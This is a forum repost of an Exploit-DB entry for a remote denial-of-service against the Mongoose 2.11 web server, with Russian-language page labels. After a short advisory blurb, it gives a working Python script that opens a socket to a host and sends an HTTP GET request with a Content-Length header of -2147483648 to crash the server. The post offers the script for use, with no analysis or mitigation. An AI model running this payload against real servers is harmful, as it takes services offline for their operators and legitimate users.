Exploit Mongoose 2.11 - 'Content-Length' HTTP Header Remote Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
35158
Проверка EDB
  1. Пройдено
Автор
JOHNLEITCH
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2010-12-27
Код:
source: https://www.securityfocus.com/bid/45602/info

Mongoose is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted input.

Successfully exploiting this issue will allow an attacker to crash the affected application, denying further service to legitimate users.

Mongoose 2.11 is vulnerable; other versions may also be affected. 

import socket
 
host = 'localhost'
port = 8080
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(8)   
s.connect((host, port))
s.send('GET / HTTP/1.1\r\n'
       'Host: ' + host + '\r\n'
       'Content-Length: -2147483648\r\n\r\n')
 
Источник
www.exploit-db.com

Похожие темы